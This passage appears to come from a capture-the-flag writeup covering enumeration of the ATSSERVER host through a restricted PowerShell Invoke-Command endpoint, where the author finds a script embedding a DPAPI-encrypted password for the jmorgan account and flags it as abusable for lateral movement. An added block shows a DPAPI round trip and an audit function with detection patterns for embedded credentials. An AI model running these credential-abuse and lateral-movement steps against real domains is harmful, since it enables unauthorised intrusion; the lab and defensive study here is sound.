Initial Foothold to ATSSERVER
Lateral movement is made to the imonks user via PowerShell's Invoke-Command cmdlet. While this is the initial foothold on the ATSSERVER host, the usual basic system enumeration appears to be out of the question due to the limited set of commands available from the dc_manage session configuration. This can be checked with PowerShell's Get-Command cmdlet.
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {Get-Command}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {Get-Alias}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Alias cat -> Get-Content ATSSERVER
Alias cd -> Set-Location ATSSERVER
Alias echo -> Write-Output ATSSERVER
Alias ls -> Get-ChildItem ATSSERVER
Alias pwd -> Get-Location ATSSERVER
Alias sc -> Set-Content ATSSERVER
Alias type -> Get-Content ATSSERVER
Only a very basic set of cmdlets is allowed. I will attempt to enumerate the system using those.
Installed Programs
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls "C:\Program Files"}
Directory: C:\Program Files
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files ATSSERVER
d----- 21/12/2021 00:11 Hyper-V ATSSERVER
d----- 15/09/2018 08:12 internet explorer ATSSERVER
d----- 01/02/2022 19:41 keepmeon ATSSERVER
d----- 21/12/2021 00:04 VMware ATSSERVER
d----- 20/12/2021 21:19 Windows Defender ATSSERVER
d----- 20/12/2021 21:12 Windows Defender Advanced Threat Protection ATSSERVER
d----- 21/12/2021 14:13 WindowsPowerShell ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls "C:\Program Files\keepmeon"}
Access to the path 'C:\Program Files\keepmeon' is denied.
+ CategoryInfo : PermissionDenied: (C:\Program Files\keepmeon:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ PSComputerName : ATSSERVER
There is an unusual directory, C:\Program Files\keepmeon. However, the imonks user is unable to access it.
wm.ps1
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls ..\Desktop}
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 07/11/2023 04:32 34 user.txt ATSSERVER
-a---- 11/01/2022 18:04 602 wm.ps1 ATSSERVER
Checking the Desktop directory of the imonks user reveals a PowerShell script, C:\Users\imonks\Desktop\wm.ps1.
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {cat ..\Desktop\wm.ps1}
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
The PowerShell script appears to be used to securely authenticate and execute a specific PowerShell cmdlet, Get-Volume, on the Acute-PC01 host as the jmorgan user.
- The $securepasswd variable contains the hexadecimal representation of the encrypted password of the jmorgan user
- The script then uses PowerShell's ConvertTo-SecureString cmdlet to convert the encrypted standard string above, $securepasswd, into a SecureString, which is then used to build a PSCredential object for network authentication
- This process is tied to the ATSSERVER host by default, as it uses the Windows Data Protection API (DPAPI) for both encryption and decryption
- This effectively means that only the same user account (jmorgan) on the same computer (ATSSERVER) will be able to use this encrypted string for any operation
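To make the DPAPI scoping described above concrete, here is an added PowerShell example that is not part of the original writeup: it round-trips a SecureString the way wm.ps1's author must have done once, then defines a hypothetical Find-EmbeddedCredential audit function that locates scripts embedding such blobs or building credentials. The sample password, account name, function name and the C:\Users path are assumptions.

```powershell
# Added example, not from the original writeup. Part 1 reproduces the DPAPI round trip that
# wm.ps1 relies on; part 2 is a defensive audit for scripts that embed such blobs.
# The password, account name and paths are constructed sample values.

# --- 1. DPAPI-protected SecureString round trip (no -Key => current user + machine scope) ---
$plain  = 'Example-Password-1'                               # constructed sample
$blob   = ConvertTo-SecureString $plain -AsPlainText -Force | ConvertFrom-SecureString
$secure = $blob | ConvertTo-SecureString                     # only the encrypting user on this host can do this
$cred   = New-Object System.Management.Automation.PSCredential ('acute\example', $secure)
$cred.GetNetworkCredential().Password -eq $plain             # True in the same user context
# Another account, or the same account on another host, fails with
# "Key not valid for use in specified state" at the ConvertTo-SecureString step.

# --- 2. Defensive audit: find scripts that embed encrypted strings or build credentials ---
function Find-EmbeddedCredential {
    param([Parameter(Mandatory)][string]$Path)
    $patterns = @(
        "(?i)'01000000d08c9ddf0115d1118c7a00c04fc297eb[0-9a-f]+'",  # DPAPI blob header, as in wm.ps1
        '(?i)ConvertTo-SecureString',                                # DPAPI, -Key or -AsPlainText variants
        '(?i)New-Object\s+System\.Management\.Automation\.PSCredential',
        '(?i)-AsPlainText'
    )
    Get-ChildItem -Path $Path -Recurse -Include *.ps1, *.psm1 -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # Record which identities can change the script alongside each finding
            $writers = (Get-Acl $file.FullName).Access |
                Where-Object { $_.FileSystemRights -match 'Write|Modify|FullControl' } |
                ForEach-Object { $_.IdentityReference.Value }
            Select-String -Path $file.FullName -Pattern $patterns | ForEach-Object {
                [pscustomobject]@{
                    File    = $file.FullName
                    Line    = $_.LineNumber
                    Match   = $_.Matches[0].Value
                    Writers = ($writers -join ', ')
                }
            }
        }
}

# Usage (assumed path): audit every profile directory on the host
# Find-EmbeddedCredential -Path 'C:\Users' | Format-Table -AutoSize
```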
PS C:\Utils> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator
The command completed successfully.
Additionally, the jmorgan user is a local administrator on the Acute-PC01 host.
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining Size PSComputerName
----------- ------------ -------------- --------- ------------ ----------------- ------------- ---- ------------
System Reserved NTFS Fixed Healthy OK 19.66 MB 50 MB ATSSERVER
NTFS Fixed Healthy OK 82.25 MB 508 MB ATSSERVER
C NTFS Fixed Healthy OK 7.57 GB 19.45 GB ATSSERVER
D Unknown CD-ROM Healthy Unknown 0 B 0 B ATSSERVER
Furthermore, the imonks user is able to execute the PowerShell script.
Overall, although the PowerShell script does not contain a PSCredential object with a cleartext password the way the previous example with the imonks user did, it can still be abused, since the current user, imonks, has access to it.
Moving on to the Lateral Movement phase